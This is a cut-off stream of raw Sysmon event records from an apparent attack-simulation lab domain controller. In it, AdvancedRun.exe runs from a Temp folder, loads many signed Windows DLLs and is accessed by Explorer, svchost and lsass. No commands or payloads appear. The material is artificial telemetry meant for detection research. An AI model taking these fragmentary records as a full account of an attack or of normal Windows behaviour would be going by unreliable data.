20:16:32.903{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.903{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.903{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004077802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.759{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.754{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.650{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.649{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.649{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.649{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004077794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.648{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.647{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004077792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.647{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004077791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.642{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004077790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.638{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.636{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.636{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.635{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.635{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.635{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.633{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.633{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.633{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.633{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.633{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.632{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.632{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.632{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.631{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.631{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.631{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.631{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.631{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.631{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.630{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.630{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.630{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.630{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.630{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.630{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.630{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.627{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.627{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.626{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 